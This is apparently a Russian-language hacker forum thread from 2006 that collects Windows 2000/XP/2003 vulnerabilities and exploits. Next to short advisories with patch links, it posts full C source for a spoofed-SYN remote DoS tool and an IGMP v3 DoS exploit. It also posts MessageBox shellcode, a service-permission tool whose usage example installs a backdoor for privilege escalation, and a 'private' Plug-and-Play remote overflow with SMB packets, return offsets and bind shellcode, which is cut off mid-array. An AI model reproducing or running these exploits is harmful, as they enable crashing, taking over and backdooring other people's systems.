Microsoft Windows 2k, XP exploits

Great · 12.01.2006

Microsoft Windows 2000/2003/XP

Опасность: Критическая

Наличие эксплоита: Нет

Описание:
Уязвимость в Microsoft Windows позволяет удаленному пользователю скомпрометировать уязвимую систему.

Переполнение буфера обнаружено при обработке специально обработанных внедренных шрифтов. В результате возможно удаленно выполнить произвольный код когда пользователь посещает специально обработанный Web сайт или просматривает email сообщение содержащее специально обработанный встроенный Web шрифт.

:zns2: Microsoft

Решение:

Microsoft Windows 2000 (requires Service Pack 4):
http://www.microsoft.com/downloads/details...4B-4146775BF590

Microsoft Windows XP (requires Service Pack 1 or 2):
http://www.microsoft.com/downloads/details...BD-B21AC75B5243

Microsoft Windows XP Professional x64 Edition:
http://www.microsoft.com/downloads/details...AB-3F833969E197

Microsoft Windows Server 2003 (with or without Service Pack 1):
http://www.microsoft.com/downloads/details...34-BDF0998869C5

Microsoft Windows Server 2003 (Itanium) (with or without SP1):
http://www.microsoft.com/downloads/details...4D-11EFA57D9CC5

Microsoft Windows Server 2003 x64 Edition:
http://www.microsoft.com/downloads/details...42-AF0D8A7BC388

Источник: SecurityLab

Ŧ1LAN · 16.01.2006

Обновленно:
Программа: Microsoft Windows 2000/2003/XP
Опасность: Критическая

Описание: Уязвимость в Microsoft Windows позволяет удаленному пользователю скомпрометировать уязвимую систему.

Уязвимость обнаружена при декомпрессии EOT (Embedded Open Type) шрифтов. Использование EOT шрифтов возможно посредством данных стиля, например:

Код:

@font-face {
        font-family: Abysmal;
        font-style:  normal;
        font-weight: normal;
        src: url(evil.eot);

Переполнение динамической памяти обнаружено в T2EMBED.DLL, которую вызывает Internet Explorer для обработки EOT шрифтов. Данные внутри такого файла архивируются в Agfa MicroType Express формате, который содержит 24 битный LZ-сжатый поток. Этот размер + 1C00h распределяются функцией MTX_LZCOMP_UnPackMemory, но, полученный в итоге размер, не проверяется перед копированием данных в блок. Удаленный пользователь может с помощью специально сформированного EOT шрифта перезаписать произвольное количество данных в буфере и выполнить произвольный код на целевой системе.

:zns2: Microsoft
Решение:

Microsoft Windows 2000 (requires Service Pack 4):
http://www.microsoft.com/downloads/details...4B-4146775BF590

Microsoft Windows XP (requires Service Pack 1 or 2):
http://www.microsoft.com/downloads/details...BD-B21AC75B5243

Microsoft Windows XP Professional x64 Edition:
http://www.microsoft.com/downloads/details...AB-3F833969E197

Microsoft Windows Server 2003 (with or without Service Pack 1):
http://www.microsoft.com/downloads/details...34-BDF0998869C5

Microsoft Windows Server 2003 (Itanium) (with or without SP1):
http://www.microsoft.com/downloads/details...4D-11EFA57D9CC5

Microsoft Windows Server 2003 x64 Edition:
http://www.microsoft.com/downloads/details...42-AF0D8A7BC388

Winux · 27.01.2006

Windows Server 2003 and XP SP2 remote DoS exploit

Код:

#include <stdio.h>
#include <ctype.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sysexits.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/*
Windows Server 2003 and XP SP2 remote DoS exploit
Tested under OpenBSD 3.6 at WinXP SP 2
Vuln by Dejan Levaja <dejan_@_levaja.com> , http://security.nnov.ru/docs7998.html
(c)oded by __blf 2005 RusH Security Team , http://rst.void.ru
Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor
f*** lamerz: Saint_I, nmalykh, Mr. Clumsy
All rights reserved.
*/

//checksum function by r0ach
u_short checksum (u_short *addr, int len)
{
u_short *w = addr;
int i = len;
int sum = 0;
u_short answer;
while (i > 0)
{
sum += *w++;
i-=2;
}
if (i == 1) sum += *(u_char *)w;
sum = (sum >> 16) + (sum & 0xffff);
sum = sum + (sum >> 16);
return (~sum);
}
int main(int argc, char ** argv)
{
struct in_addr src, dst;
struct sockaddr_in sin;
struct _pseudoheader {
struct in_addr source_addr;
struct in_addr destination_addr;
u_char zero;
u_char protocol;
u_short length;
} pseudoheader;
struct ip * iph;
struct tcphdr * tcph;
int mysock;
u_char * packet;
u_char * pseudopacket;
int on = 1;
if( argc != 3)
{
fprintf(stderr, "r57windos.c by __blf\n");
fprintf(stderr, "RusH Security Team\n");
fprintf(stderr, "Usage: %s <dest ip> <dest port>\n", argv[0]);
return EX_USAGE;
}
if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL)
{
perror("malloc()\n");
return EX_OSERR;
}
inet_aton(argv[1], &src);
inet_aton(argv[1], &dst);
iph = (struct ip *) packet;
iph->ip_v = IPVERSION;
iph->ip_hl = 5;
iph->ip_tos = 0;
iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr));
iph->ip_off = htons(IP_DF);
iph->ip_ttl = 255;
iph->ip_p = IPPROTO_TCP;
iph->ip_sum = 0;
iph->ip_src = src;
iph->ip_dst = dst;
tcph = (struct tcphdr *)(packet +sizeof(struct ip));
tcph->th_sport = htons(atoi(argv[2]));
tcph->th_dport = htons(atoi(argv[2]));
tcph->th_seq = ntohl(rand());
tcph->th_ack = rand();
tcph->th_off = 5;
tcph->th_flags = TH_SYN; // setting up TCP SYN flag here
tcph->th_win = htons(512);
tcph->th_sum = 0;
tcph->th_urp = 0;
pseudoheader.source_addr = src;
pseudoheader.destination_addr = dst;
pseudoheader.zero = 0;
pseudoheader.protocol = IPPROTO_TCP;
pseudoheader.length = htons(sizeof(struct tcphdr));
if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL)
{
perror("malloc()\n");
return EX_OSERR;
}
memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader));
memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr));
tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr));
mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
if(!mysock)
{
perror("socket!\n");
return EX_OSERR;
}
if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
{
perror("setsockopt");
shutdown(mysock, 2);
return EX_OSERR;
}
sin.sin_family = PF_INET;
sin.sin_addr = dst;
sin.sin_port = htons(80);
if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1)
{
perror("sendto()\n");
shutdown(mysock, 2);
return EX_OSERR;
}
printf("Packet sent. Remote machine should be down.\n");
shutdown(mysock, 2);
return EX_OK;
}

И откомпиленая версия:

Использование: w2k3 <dest ip> <dest port>
Из CMD ессно.

Winux · 30.01.2006

XP SP2 Registry Backdoor
Обнаружен следующий сабж:
ключики в реестре могут иметь только определенную длинну (кол-во символов)

* Windows Server 2003 и Windows XP: 16,383 characters
* Windows 2000: 260 ANSI characters или 16,383 Unicode characters.
* Windows Me/98/95: 255 characters

Короче что это дает:
Идем в реестр, например в

Код:

HKLM\SOFTWARE\Mcft\Windows\CurrentVersion\Internet Settings\Empty

Создаем там стринг валью следующего содержания:

helloworldhelloworldhelloworldhelloworldhelloworldhelloworldhellowor ldhelloworldhelloworldhelloworldhelloworldhelloworldhelloworldhellow orldhelloworldhelloworldhelloworldhelloworldhelloworldhelloworldhell oworldhelloworldhelloworldhelloworldhelloworldhelloworl

Что вы там напихаете - не имеет значения.
Обновляем (F5) и видим что ключик изчез. Даже после перезагрузки компа ключ не появится.

Для чего это может пригодится на практике я не знаю.

Проверено:
XP SP2 Eng, SP1 и 2K RUS, WinXP SP2 POL. Наверняка работает и на других. Попробуйте и отпишите резалты.

Winux · 31.01.2006

win32/xp sp2 Pop up message box 110 bytes

Код:

/*
Author : Omega7
Assembly Code : Steve Hanna
Changed by : Omega7
Description : It is 110 Byte Shellcode which Pops up Message Box Under Windows Xp SP2
If you Want to use it in any other Windows You need to change the address
that i have marked!

*/

#include <stdlib.h>
#include <string.h>

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb"
"\x77\x1d\x80\x7c"    //***LoadLibraryA(libraryname) IN WinXP sp2***
"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb"
"\x28\xac\x80\x7c"   //***GetProcAddress(hmodule,functionname) IN sp2***
"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51"
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff"
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"
"\xff\x4f\x6d\x65\x67\x61\x37\x4e";

/*MessageBox shellcode for Windoew xp sp2 */

int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}

(с)

Ŧ1LAN · 11.02.2006

Повышение привилегий в Microsoft Windows
Программа:
Microsoft Windows XP SP1
Microsoft Windows Server 2003
Описание:
Уязвимость позволяет локальному пользователю повысить свои привилегии на системе.

Уязвимость существует из-за наличия небезопасных SERVICE_CHANGE_CONFIG разрешений для служб UPnP, NetBT, SCardSvr и SSDP. Локальный пользователь может с помощью уязвимого сервиса запустить злонамеренное приложение и повысить свои привилегии на системе.

Эксплоит:
SrvCheck.c

Код:

/*
* Privilege Checker for Windows Services
* (c) 2006 Andres Tarasco ( atarasco _at_ gmail.com )
* http://www.haxorcitos.com
*
* Based on Sudhakar Govindavajhala and Andrew Appel paper
* http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf
*
* usage:
* You should execute this tool without Admin privileges on the target system
* using for example an user account
*
* srvcheck.exe -l              - show vulnerable services
* srvcheck.exe -m Service PATH - modify service configuration (install backdoor)
*
* Example for Windows XP SP2 computer

D:\>whoami
HXR\test

D:\>net user test |find "grupo"
Miembros del grupo local                    *Usuarios
Miembros del grupo global                   *Ninguno

D:\>srvchecker.exe -l
Services Permissions checker
[SSDPSRV]               Servicio de descubrimientos SSDP
Status: 0x1
Path: C:\WINDOWS\System32\svchost.exe -k LocalService

[upnphost]              Host de dispositivo Plug and Play universal
Status: 0x1
Path: C:\WINDOWS\System32\svchost.exe -k LocalService

You were Lucky. 2 services found

D:\>srvchecker -m upnphost c:\windows\temp\backdoor.exe
Services Permissions checker
(c) 2006 Andres Tarasco - atarasco _at_ gmail.com

service modified =)

D:\>net start upnphost
*
* NOTE: This code compiles under Borland C++ Builder
*
*/
#include <stdio.h>
#include <windows.h>

void doFormatMessage( unsigned int dwLastErr );

int main(int argc, char* argv[])
{

SC_HANDLE SCM;
LPENUM_SERVICE_STATUS_PROCESS lpServices;
unsigned int n;
DWORD nSize = 0;
DWORD nServicesReturned;
DWORD nResumeHandle;
DWORD dwServiceType;
SC_HANDLE Svc;
LPQUERY_SERVICE_CONFIG lpConfig;
DWORD dwByteNeeded;
char SrvName[256],SrvDesc[256];
BYTE LIST=0;
unsigned int l=0;

printf(" Services Permissions checker\n");
printf(" (c) 2006 Andres Tarasco - atarasco _at_ gmail.com\n\n");

if ( ( (argc==1) || (argc>5) ) ||
    ( (argc==2) && (strcmp(argv[1],"-l")!=0) ) ||
    ( (argc==4) && (strcmp(argv[1],"-m")!=0) )
   ) {
    printf("Usage:\n\t-l (list vulnerable services)\n");
    printf("\t-m SRVNAME NewPath (change the configuration for that service)\n");
    exit(1);
}

if (argv[1][1]=='l') {
    LIST=1;
    SCM = OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
}else {
    SCM = OpenSCManager(NULL,NULL,STANDARD_RIGHTS_WRITE);
}
if (!SCM){
    printf("OpenScManager FAILED\n");
    doFormatMessage(GetLastError());
    exit(-1);
}

if (LIST) {
    nResumeHandle = 0;
    dwServiceType = SERVICE_WIN32 | SERVICE_DRIVER;
    lpServices = (LPENUM_SERVICE_STATUS_PROCESS) LocalAlloc(LPTR, 65535);
    if (!lpServices) {
        printf("LocalAlloc Failed\n");
        exit(-1);
    }
    memset(lpServices,'\0',sizeof(lpServices));
    if (EnumServicesStatusEx(SCM, SC_ENUM_PROCESS_INFO,
        dwServiceType, SERVICE_STATE_ALL,
        (LPBYTE)lpServices, 65535,
        &nSize, &nServicesReturned,
        &nResumeHandle, NULL) == 0) {
        printf("EnumServicesStatusEx FAILED\n");
        exit(-1);
    }

    for (n = 0; n < nServicesReturned; n++) {
        Svc = OpenService(SCM,lpServices[n].lpServiceName, SERVICE_CHANGE_CONFIG | SC_MANAGER_ENUMERATE_SERVICE |GENERIC_READ);
        if (Svc!=NULL) {
            l++;
            printf("[%s]\t\t%s\n",lpServices[n].lpServiceName, lpServices[n].lpDisplayName);
            printf("Status: 0x%x\n",lpServices[n].ServiceStatusProcess.dwCurrentState);
            dwByteNeeded = 0;
            lpConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024);
            if (QueryServiceConfig(Svc, lpConfig, 1024, &dwByteNeeded)!=0) {
                printf("Path: %s\n\n",lpConfig->lpBinaryPathName);
            }else {
                doFormatMessage(GetLastError());
            }
        }
    }
} else {
    Svc = OpenService(SCM,argv[2],SERVICE_CHANGE_CONFIG | STANDARD_RIGHTS_WRITE);
    if (Svc!=NULL) {
         if (ChangeServiceConfig(
                Svc,
                SERVICE_NO_CHANGE,
                SERVICE_AUTO_START,
                SERVICE_ERROR_IGNORE,
                argv[3],
                NULL,
                NULL,
                "",
                NULL,
                NULL,
                NULL)!=0) {
                printf("service modified =)\n");
         } else {
            printf("modification failed\n");
         }
    } else {
        printf("Unable to open Service %s\n",argv[2]);
    }
}

if ( (LIST) ) {
    if (l>0)
        printf("\n You were Lucky. %i services found\n",l);
    else
        printf("\No luck\n");
} 


CloseServiceHandle(SCM);
LocalFree(lpServices);
return(1);
}




void doFormatMessage( unsigned int dwLastErr )  {
    char cadena[512];
    LPVOID lpMsgBuf;
    FormatMessage(
        FORMAT_MESSAGE_ALLOCATE_BUFFER |
        FORMAT_MESSAGE_IGNORE_INSERTS |
        FORMAT_MESSAGE_FROM_SYSTEM,
        NULL,
        dwLastErr,
        MAKELANGID( LANG_NEUTRAL, SUBLANG_DEFAULT ),
        (LPTSTR) &lpMsgBuf,
        0,
        NULL );
    sprintf(cadena,"ERRORCODE %i: %s\n", dwLastErr, lpMsgBuf);
    printf("Error: %s\n",cadena);
    LocalFree( lpMsgBuf  );
}

Решение: Установите SP2 для Windows XP и SP1 для Windows Server 2003. Также следуйте инструкциям, указанным в уведомлении.
:zns2: производитель

Ŧ1LAN · 22.03.2006

MS Windows XP/2003 (IGMP v3) Denial of Service Exploit

Эксплоит:

Код:

/* 
        IGMP v3 DoS Exploit 

        ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html 
        ref: http://www.Mcft.com/technet/security/Bulletin/MS06-007.mspx 


        by Alexey Sintsov (dookie@inbox.ru) 


        Req: 

                Administrator rights on system 
                Windows Firewall off (for sending RAW packets) 

        Affected Products: 
                Mcft Corporation Windows XP All 
                Mcft Corporation Windows Server 2003 All 
 */ 


#include <stdio.h> 
#include <winsock2.h> 


#pragma comment(lib, "Ws2_32.lib") 

typedef struct iphdr 
{ 

        unsigned char  verlen;                  // IP version & length 
        unsigned char  tos;                             // Type of service 
        unsigned short total_len;               // Total length of the packet 
        unsigned short ident;                   // Unique identifier 
        unsigned short frag_and_flags;  // Flags 
        unsigned char  ttl;                             // Time to live 
        unsigned char  proto;                   // Protocol (TCP, UDP etc) 
        unsigned short checksum;                // IP checksum 
        unsigned int   sourceIP;                // Source IP 
        unsigned int   destIP;                  // Destination IP 
        unsigned short  options[2]; 

} IPHEADER; 




typedef struct igmphdr { 
          unsigned char                 type; 
          unsigned char                 code; 
                  unsigned short        checksum; 
                  unsigned long                 group; 
                  unsigned char                 ResvSQVR; 
                  unsigned char                 QQIC; 
                  unsigned short                num; 
                  unsigned long                 addes; 

 } IGMPHEADER; 






USHORT checksum(USHORT *buffer, int size) 
{ 
    unsigned long cksum=0; 

    while (size > 1) { 
        cksum += *buffer++; 
        size  -= sizeof(USHORT); 
    } 

    if (size) 
        cksum += *(UCHAR*)buffer; 

    cksum = (cksum >> 16) + (cksum & 0xffff); 
    cksum += (cksum >>16); 

    return (USHORT)(~cksum); 
} 

int sendIGMP(char* a, char* b) 
{ 


        unsigned int dst_addr, src_addr; 

        IPHEADER ipHeader; 
        IGMPHEADER igmpHeader; 



        dst_addr=inet_addr (b); 
        src_addr=inet_addr (a); 


        char szSendBuf[60]={0}; 
        int rect; 

        WSADATA WSAData; 
        if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0) 
                return FALSE; 

        SOCKET sock; 
        if ((sock = WSASocket(AF_INET,SOCK_RAW, 
                IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) { 
                printf("Create socket error"); 
                WSACleanup(); 
                return FALSE; 
        } 


        BOOL flag=TRUE; 
        if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == 
SOCKET_ERROR) { 
                printf("Set options error"); 
                closesocket(sock); 
                WSACleanup(); 
                return FALSE; 
        } 



        SOCKADDR_IN ssin; 
        memset(&ssin, 0, sizeof(ssin)); 
        ssin.sin_family=AF_INET; 
        ssin.sin_port=htons(99); 
        ssin.sin_addr.s_addr=dst_addr; 


        ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); 


        ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader)); 


        ipHeader.ident=htons(0); 

        ipHeader.frag_and_flags=0; 

        ipHeader.ttl=128; 
        ipHeader.proto=IPPROTO_IGMP; 

        ipHeader.checksum=0; 


        ipHeader.tos=0; 

        ipHeader.destIP=dst_addr; 
        ipHeader.sourceIP=src_addr; 

        //Ip options 
        ipHeader.options[0]=htons(0x0000); //bug is here =) 
        ipHeader.options[1]=htons(0x0000); 


        igmpHeader.type=0x11; //v3 Membership Query 
        igmpHeader.code=5; 
        igmpHeader.num=htons(1); 
        igmpHeader.ResvSQVR=0x0; 
        igmpHeader.QQIC=0; 
        igmpHeader.group=inet_addr("0.0.0.0"); 
        igmpHeader.addes=dst_addr; 

        igmpHeader.checksum=0; 


        memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader)); 

        igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader)); 

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
        memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader)); 
        memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4); 

        ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, 
sizeof(ipHeader)+sizeof(igmpHeader))); 

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 


        rect=sendto(sock, szSendBuf, 
sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin)); 

        if (rect==SOCKET_ERROR) { 
                printf("Send error: <%d>\n",WSAGetLastError()); 
        closesocket(sock); 
                WSACleanup(); 
                return 0; 
        } 



        closesocket(sock); 
        WSACleanup(); 



return 1; 


} 



main(int argc, char **argv) 
{ 


        if(argc<2) 
        { 
                printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n"); 
                printf("Usage:\n"); 
                printf("c:\\igmps.exe <target ip> <source ip>\n\n"); 
                exit(0); 
        } 


        sendIGMP(argv[2],  argv[1]); 


        return 0; 
} 

// milw0rm.com [2006-03-21]

откомпиленая версия в атаче.
Хотя можно ещё тут попробовать.

З.Ы. использовать только в ознакомительных целях! И я не несу никакой ответственности за то что в этих архивах.

Ŧ1LAN · 08.04.2006

Plug-and-Play Remote Overflow Private version (C++)

Код:

#include "includes.h" 
#include "functions.h" 
#include "extern.h" 

#ifndef NO_PNP 
char SMB_Negotiate[] = 
   "\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8" 
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" 
   "\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F" 
   "\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02" 
   "\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F" 
   "\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70" 
   "\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30" 
   "\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54" 
   "\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00"; 

char SMB_SessionSetupAndX[] = 
   "\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8" 
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" 
   "\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00" 
   "\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E" 
   "\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00" 
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
   "\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00" 
   "\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00" 
   "\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00" 
   "\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00" 
   "\x2E\x00\x30\x00\x00\x00\x00\x00"; 

char SMB_SessionSetupAndX2[] = 
   "\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8" 
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" 
   "\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00" 
   "\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E" 
   "\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46" 
   "\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40" 
   "\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40" 
   "\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48" 
   "\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3" 
   "\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00" 
   "\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00" 
   "\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00" 
   "\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00" 
   "\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00"; 

char SMB_TreeConnectAndX[] = 
   "\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8" 
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" 
   "\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00"; 

char SMB_TreeConnectAndX_[] = 
   "\x00\x00\x3F\x3F\x3F\x3F\x3F\x00"; 

char SMB_PipeRequest_browser[] = 
   "\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8" 
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" 
   "\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00" 
   "\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
   "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00" 
   "\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00" 
   "\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00"; 

char SMB_PNPEndpoint[] = 
   "\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8" 
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" 
   "\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00" 
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02" 
   "\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00" 
   "\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00" 
   "\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00" 
   "\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11" 
   "\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A" 
   "\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00"; 

char RPC_call_part1[] = 
   "\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8" 
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" 
   "\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00" 
   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02" 
   "\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00" 
   "\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00" 
   "\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00" 
   "\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00" 
   "\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00" 
   "\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00" 
   "\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
   "\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90" 
   "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76" 
   "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76" 
   "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76" 
   "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76" 
   "\xEB\x08\x90\x90"; 

char RPC_call_part2[] =    
   "\xEB\x08\x90\x90\x67\x15\x7a\x76" 
   "\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90" 
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; 

char RPC_call_end[] = 
   "\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00"; 

char offset_universal_SP4[] =  "\x79\x3C\x01\x01"; //Windows 2000 SP4 Universall 
char offset_SP0_SP4_eng[] = "\xf6\x38\x7a\x76"; //Windows 2000 SP0-SP4 English 
char offset_winXP_SP1[] = "\x2a\x57\x8c\x75"; //Windows XP SP1 

char bind_shellcode[] = 
   "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19" 
   "\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8" 
   "\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc" 
   "\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae" 
   "\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f" 
   "\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc" 
   "\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc" 
   "\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67" 
